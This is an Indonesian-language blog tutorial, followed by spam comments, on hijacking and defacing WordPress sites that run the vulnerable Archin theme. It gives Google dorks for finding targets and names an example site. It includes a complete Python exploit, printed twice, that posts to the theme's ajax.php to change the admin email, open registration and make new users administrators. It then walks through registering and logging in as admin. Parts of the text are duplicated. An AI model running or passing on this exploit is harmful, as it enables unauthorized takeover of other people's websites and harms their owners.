Assalamulaikum Wr Wb
sebelumnya kita memanjatkan puji syukur
ke hadirat allah swt.,
karena kita semua diberi kesehatan dan rejeki
amiin;.,
#Note: Di dunia hacking tidak ada yang instant., kita harus terus berusaha selagi ada usaha
dan di dunia hacking tidak ada orang malas seperti mereka yang tidak mau usaha
ke hadirat allah swt.,
karena kita semua diberi kesehatan dan rejeki
amiin;.,
#Note: Di dunia hacking tidak ada yang instant., kita harus terus berusaha selagi ada usaha
dan di dunia hacking tidak ada orang malas seperti mereka yang tidak mau usaha
mereka yang berhasil adalah orang yang berusaha untuk tujuannya
Hallo sobat ^_^ kali ini saya akan mengshare teknik lain lagi hihihihih....
Kira - kira teknik apa yah ? yang akan saya share hari ini ?
simak berikut hehehehe :v
BAHAN - BAHAN :
Pyhton Last version <Dowload>
Dork :
/wp-content/themes/*/hades_framework/
/wp-content/themes/felici/hades_framework/
/wp-content/themes/averin/hades_framework/
/wp-content/themes/shotzz/hades_framework/
/wp-content/themes/KLR/hades_framework/
/wp-content/themes/yvora/hades_framework/
inurl:/wp-content/themes/felici/hades_framework/ site:.com
/wp-content/themes/*/hades_framework/
/wp-content/themes/felici/hades_framework/
/wp-content/themes/averin/hades_framework/
/wp-content/themes/shotzz/hades_framework/
/wp-content/themes/KLR/hades_framework/
/wp-content/themes/yvora/hades_framework/
inurl:/wp-content/themes/felici/hades_framework/ site:.com
inurl:/wp-content/themes/shotzz/hades_framework/ site:.info
inurl:/wp-content/themes/KLR/hades_framework/ site:.uk
inurl:/wp-content/themes/yvora/hades_framework/ site:.net
intext:yvora 2011 site:.com
intext:yvora 2011 site:.uk
intext:Themes shotzz site:.nl
intitle:[flash] swf
intext:yvora 2011 site:.com
intext:yvora 2011 site:.uk
intext:Themes shotzz site:.nl
intitle:[flash] swf
Exploit:
/wp-content/themes/temanya/hades_framework/option_panel/ajax.php
/wp-content/themes/temanya/hades_framework/option_panel/ajax.php
NB: Mau lihat temanya ? ., liat trik cara melihat tema suatu website
Exploit Pyhton :
copy Exploit Pyhton berikut ke notepad :
# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib
#target site
site = "target website"
#path to ajax.php
url = "/wp-content/themes/yvora/hades_framework/option_panel/ajax.php"
def ChangeOption(site, url, option_name, option_value):
params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPConnection(site)
conn.request("POST", url, params, headers)
response = conn.getresponse()
print response.status, response.reason
data = response.read()
print data
conn.close()
ChangeOption(site, url, "admin_email", "emailmu")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"
NB: Ganti tulisan biru dengan Target website contoh : www.site.com <tidak usah http//>
Ganti tulisan Hitam dengan Exploit website (url belakang target)
misal :site.com/wp-content/themes/yvora/hades_framework/option_panel/ajax.php
Ganti tulisan Biru muda dengan emailmu Contoh : yazid4u@gmail.com
Save file nya dengan extensi .py
contoh lol.py
Masih kurang paham ? lihat cara mengsave file .py dari notepad di google ^_^
Cara melihat Tema suatu website (cms wordpress) :
copy Exploit Pyhton berikut ke notepad :
# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib
#target site
site = "target website"
#path to ajax.php
url = "/wp-content/themes/yvora/hades_framework/option_panel/ajax.php"
def ChangeOption(site, url, option_name, option_value):
params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPConnection(site)
conn.request("POST", url, params, headers)
response = conn.getresponse()
print response.status, response.reason
data = response.read()
print data
conn.close()
ChangeOption(site, url, "admin_email", "emailmu")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"
NB: Ganti tulisan biru dengan Target website contoh : www.site.com <tidak usah http//>
Ganti tulisan Hitam dengan Exploit website (url belakang target)
misal :site.com/wp-content/themes/yvora/hades_framework/option_panel/ajax.php
Ganti tulisan Biru muda dengan emailmu Contoh : yazid4u@gmail.com
Save file nya dengan extensi .py
contoh lol.py
Masih kurang paham ? lihat cara mengsave file .py dari notepad di google ^_^
Cara melihat Tema suatu website (cms wordpress) :
Pertama - tama kita harus punya target website..
thema yang vuln archin adalah
yvora, shotzz , KLR , Averin , dll
saya mengambil yang thema shotzz., karna kebanyakan thema vuln adalah tema shotzz
misalkan target : http://kern1.linuxpl.info/kern/
tekan ctrl + u pada url website tadi
kalo udh cari url ini : www.site.tadi/wp-content/themes/themanya/style.css
contoh ., gambar dibawah ini
NB: seperti gambar yang saya tandai
Lalu klik url tadi., contoh www.site.tadi/wp-content/themes/themanya/style.css
dah ketemu kan ^_^ thema webnya xixixixix :v
lebih jelasnya anda bisa search di google ^_^
TRIK (CARA MENGEKSEKUSI) :
thema yang vuln archin adalah
yvora, shotzz , KLR , Averin , dll
saya mengambil yang thema shotzz., karna kebanyakan thema vuln adalah tema shotzz
misalkan target : http://kern1.linuxpl.info/kern/
tekan ctrl + u pada url website tadi
kalo udh cari url ini : www.site.tadi/wp-content/themes/themanya/style.css
contoh ., gambar dibawah ini
NB: seperti gambar yang saya tandai
Lalu klik url tadi., contoh www.site.tadi/wp-content/themes/themanya/style.css
dah ketemu kan ^_^ thema webnya xixixixix :v
lebih jelasnya anda bisa search di google ^_^
TRIK (CARA MENGEKSEKUSI) :
pertama - tam kita cari target di www.google.com atau www.google.co.id
Kita search dengan dork kepercayaan kita masing masing hihihihi :v
Kalo ane sih pake dork kepercayaan ane : "inurl:wp content themes shotzz" site:uk"
Lihat seperti gambar dibawah :
ya,setelah kita memilih target., kita ganti url, target dengan exploit kita masing - masing.,
nb : exploit <menambahkan / menghapus alamat belakang suatu website >
kalo exploit web ini : /wp-content/themes/shotzz/hades_framework/option_panel/ajax.php
Cara melihat Tema suatu website (cms wordpress) di google
Kalo web tadi blank., setelah anda exploit tin ., berarti web tadi vuln..!!!!
CONTOH LIHAT GAMBAR DIBAWAH :
Klik ikon start start > Run > input "cmd" nanti akan muncul sebuah command prompt.
CONTOH :
Ketik "cd C:\" di cmd tadi
kira - kira gambar akan seperti ini
NB : Exploit phyton harus berada di disk C:\
kita edit exploit phyton tadi klik kanan exploit phyton > pilih open with > klik notepad
NB : Exploit phyton harus berada di disk C:\
Kita edit file tadi., kira - kira seperti gambar dibawah ini
Lalu klik save
Lalu kita jalankan file exploit phyton tadi lewat cmd.,
input "namajudulfiletadi.py" contoh judul : LOL.py
Kalo ada tulisan :
200 OK
success
200 OK
success
200 OK
success
Now register a new user, they are an administrator by default!
berarti bisa...!!
lihat gambar dibawah :
Kalo udh kita form login site tadi.,
tambahkan exloit berikut : /wp-login.php atau /wp-login/
contoh : www.site.tadi/wp-login.php/
jika tidak bisa. tambahkan path web tadi contoh : site.tadi/path/wp-login.php
contoh url form login : site.tadi/tadi/wp-login.php
lalu klik ikon register.,
jika tidak ada ikon register., karena admin mendisablenya.,
maka kalian harus menemukan form register.nya
default exploit form register : /wp-login.php?action=register
/wp-login?action=register
/wp-register/
jika ada path., silahkan tambahkan path web tadi ^_^
Kalo udh isi kolom "username" dan kolom "email"
dengan user dan email anda
seperti gambar dibawah ini ^_^
Jika selesai akan ada tautan berikut (lihat gambar dibawah) di atas (header)
kolom register tadi...
Jika sudah check email kalian ^_^ akan ada email dari website tadi ^_^
NB: Email bisa di folder spam., Pembaruan , Utama
sekrang., buka salah satu email dari web tadi.,
dan kalian akan dikasih user., <yang kalian daftarkan >
dan default pass., admin tadi..
contoh gambar dibawah :
dan silahkan login di website tadi., keterangan form login ., ada di email balasan web tadi ^_^
silahkan login ^^., dan jika berhasil.,
kira- kira tampilan nya seperti beriku
lihat gambar
SELAMAT MENIKMATI :)
Yak,tulah kira-kira artikel saya tentang Cara mendeface website
Jika anda ingin Mengcopi paste, Artikel ini .. silahkan saja
asalkan anda mencantumkan sumbernya yaitu cara Membobol website dengan Archin Themes vuln | Exploit wordpress
Keyword : Contoh., Cara,Membuat , menghack , mendeface , deface, hack , hacker , defacer , bobol , website , web , url , address bar , dengan , index., home , archin , exploit , Wordpress
html., footer, php , cms , dashboard , admin , menjadi ,
TERIMAKASIH
Keyword : Contoh., Cara,Membuat , menghack , mendeface , deface, hack , hacker , defacer , bobol , website , web , url , address bar , dengan , index., home , archin , exploit , Wordpress
html., footer, php , cms , dashboard , admin , menjadi ,
http://yazzidblok4u.blogspot.com/2013/10/deface-archin-wordpress-theme-32.html
Tes Tes
ReplyDelete[Deface] Archin Wordpress Theme 3.2 Unauthenticated Configuration Access Vulnerability - Yazzid Blogs >>>>> Download Now
Delete>>>>> Download Full
[Deface] Archin Wordpress Theme 3.2 Unauthenticated Configuration Access Vulnerability - Yazzid Blogs >>>>> Download LINK
>>>>> Download Now
[Deface] Archin Wordpress Theme 3.2 Unauthenticated Configuration Access Vulnerability - Yazzid Blogs >>>>> Download Full
>>>>> Download LINK 4l
KEREN MAS
ReplyDeleteDo you mind if I quote a couple of your posts as
ReplyDeletelong as I provide credit and sources back
to your site? My blog is in the exact same area of interest as yours and my users would genuinely benefit from some of the information you provide here.
Please let me know if this alright with you. Thank you!
Here is my webpage ... clash of clans triche gemmes
illimité, ,
Hello Dear, are you truly visiting this site daily,
ReplyDeleteif so then you will definitely get pleasant know-how.
My web-site: http://nouveauclashofclanstriche.blogspot.com/
Hi, i think that i saw you visited my weblog thus i came to
ReplyDelete“return the favor”.I'm trying to find things to improve my website!I suppose its ok to use
a few of your ideas!!
My web page mother of the bride speeches and toasts ()
Hey there would you mind letting me know which hosting company you're using?
s, I appreciate
ReplyDeleteI've loaded your blog in 3 different internet browsers and I must say
this blog loads a lot faster then most. Can you recommend a good
hosting provider at a honest price?
it!
Feel free to surf to my blog ... http://nouveauclashofclanstriche.blogspot.com/
Hey there! Do you know if they make any plugins to help
ReplyDeletewith SEO? I'm trying to get my blog to rank for soome targeted keywords but I'm not seeing vry good success.
If you know of any please share. Appreciate it!
Also visit my webpage luxury holidays
Hello ѡould уou mind letting me know whіch web host you're using?
ReplyDeleteІ've loaded yߋur blog іn 3 completely ԁifferent interrnet
browsers аnd I must ѕay this blog loads a lot
quicker tҺen mօst. Can you recommend a ցood
internet hosting provider ɑt a fair price? Ҭhanks a lot, I аppreciate it!
Feel free tߋ visit my web-site: Cheap Life Insurance And Critical Illness Cover
Whoa! Tɦis blog looks eҳactly lіke mʏ oold οne!
ReplyDeleteIt's on a enhtirely ɗifferent suibject ƅut it hɑs pretty much the same pɑge lagout
аnd design. Wonderful choice of colors!
My website; best deals on Life Insurance
І’m not thаt much of a online reader tօo bе honest
ReplyDeletebսt your sites гeally nice, keep itt up! I'll ǥo ahead and bookmark уour website tߋօ come ƅack dߋwn the road.
Many tɦanks
Ңere is my web site :: Temp Car Insurance Abroad
I absolutely love your blog and find the majority
ReplyDeleteof your post's to be exactly what I'm looking for.
Does one offer guest writers to write content for you? I wouldn't mind composing a post or
elaborating on most of the subjects you write concerning
here. Again, awesome blog!
Have a look at my webpage; live jasmin
What's up to every body, it's my first pay a visit of this website; this weblog
ReplyDeleteconsists of remarkable and really fine information in support of readers.
My blog: bare minerals makeup ()
This paragraph presents clear idea designed for the new visitors of blogging, that really how to do running a blog.
ReplyDeleteMy website - Boom Beach hack no survey
Wɦat a іnformation of սn-ambiguity аnd preserveness
ReplyDeleteof precious knowledge regɑrding unexpectwd feelings.
My pаge: gatorade coupons may 2012
Hey! This iis myy 1st ϲomment hеre so I just wanteԁ tօ give
ReplyDeleteа quick shout օut and tell yօu ӏ really enjoy reading yolur blog posts.
Сan yоu sսggest any ߋther blogs/websites/forums thɑt deal with
the szme subjects? Τhanks!
Also visit mү page - powerade Coupons oct 2011
Everyоne loves whɑt yoս guys tend tߋ be սp too.
ReplyDeleteThis type ߋf clever ԝork annd coverage! Қeep up tthe
terrific աorks guys I've icorporated уou gujys tߋ my own blogroll.
Feel free to surf to mʏ web bblog :: ragu Coupons Jan 2013
Very nice post. I simply stumbled upon your weblog and woshed to say that I've really loved browsing your blog posts.
ReplyDeleteIn any case I'll be subsacribing on your rss feed and
I am hoping you write again very soon!
My blog post: Michigan foreclosure defense attorney (blog.679artists.com)
Wow! Afteer all І got a weblog fгom wheгe I bbe capable оf in fact obtain valuable іnformation concerning mmy study аnd knowledge.
ReplyDeleteΑlso visit my webpage; Manufacturer coupons For powerade zero
І truly love ʏߋur website.. Great colors &
ReplyDeletetheme. Did you devvelop this website ʏourself?
Please reply backk аs I'm wantijng tо create mү оwn website and want to learn where youu got this from օr just what the
theme іs named. Kudos!
my web page; Keurig Mini Coupons
I гeally love yoսr site.. Ԍreat colors & theme. Did үоu maҡe this weeb site youгself?
ReplyDeletePleasse reply Ƅack аs I'm attempting tо create mƴ own personal
site and wouuld like to learn ԝhегe ƴou gоt tҺis from
οr exaactly wɦat the theme iѕ named. Thɑnks!
Feel free to surf tо my web-site - nabisco cheese nips coupons 2011
Your style is really unique inn comparison to other folks I've reaad stuff from.
ReplyDeleteI appreciate yyou for posting when yoou have the opportunity,
Guess I will just bookmark this site.
my homepage :: Hair Growth Treatment
Hi, constantly i used to check blog posts here early in the morning,
ReplyDeletebecause i love to gain knowledge of more and more.
my blog :: mausummery lawn online store
Hllo everybody, here eveery one iis sharing tҺese knowledge, sօ it's fastidious tto
ReplyDeleteread this webpage, аnd I սsed to go to see this weblog everyday.
Also visit my homepage :: Slim fast printable coupons
No matter if ѕome one searches for his vital tҺing,
ReplyDeleteso he/sҺе wants to be ɑvailable tҺɑt in ɗetail,
therefore thɑt thing is maintained ovver hеre.
Review my web blog ... Ragu Coupons May 2013
Ӏ lіke thе valuable info үou provide іn your articles.
ReplyDeleteI'll bookmark your blog ɑnd check again ɦere frequently.
I am գuite ceгtain I will learn many new stuff гight here!
Ԍood luck fоr the next!
Ϻy weblog chobani coupons pdf 2014
WҺat's uρ to all, how is the wholle thіng,
ReplyDeleteI thіnk everү оne іs getting more from tɦis web site, аnd your vierws ɑre goid dersigned fοr
neԝ people.
Check out my web-site Printable Coupons For Lean Cuisine
Wow, tɦat's what Ι wаs searching for, աhat a stuff!
ReplyDeleteƿresent here at this webpage, thnks admin of this site.
Review mʏ wweb site :: Special K Diet Drink Coupons
ReplyDeleteIt's a shame you don't have a donate button! I'd without a doubt donate to this outstanding blog!
ReplyDeleteI suppose for now i'll settle for bookmarking and adding your RSS feed to my Google account.
I look forward to new updates and will talk about this site
with my Facebook group. Talk soon!
my website; please bang my wife
Good article. I'm dwaling with some of these issues as well..
ReplyDeleteAlso visit my site :: loans for people with poor credit
When I initially commented I seem to have clicked on the -Notify mee when new comments arre added- checkbox and now each time
ReplyDeletea comment is added I receeive 4 emails with thee
same comment. There has to be a way you can remove me from that service?
Kudos!
Stop by my web site ... best online patio furniture store
I know this if off topic ƅut I'm looking іnto starrting mү own weblog
ReplyDeleteɑnd was curious what аll іs required tо get set up?
Ι'm ssuming Һaving a blog lіke yoսrs would cost а pretty penny?
I'm not verry web sart ѕo Ι'm not 100% sure. Any suggestions οr advice would be greatly appreciated.
Appгeciate it
Here is my blog homepage ()
[Deface] Archin Wordpress Theme 3.2 Unauthenticated Configuration Access Vulnerability - Yazzid Blogs >>>>> Download Now
ReplyDelete>>>>> Download Full
[Deface] Archin Wordpress Theme 3.2 Unauthenticated Configuration Access Vulnerability - Yazzid Blogs >>>>> Download LINK
>>>>> Download Now
[Deface] Archin Wordpress Theme 3.2 Unauthenticated Configuration Access Vulnerability - Yazzid Blogs >>>>> Download Full
>>>>> Download LINK
Click to see the code!
To insert emoticon you must added at least one space before the code.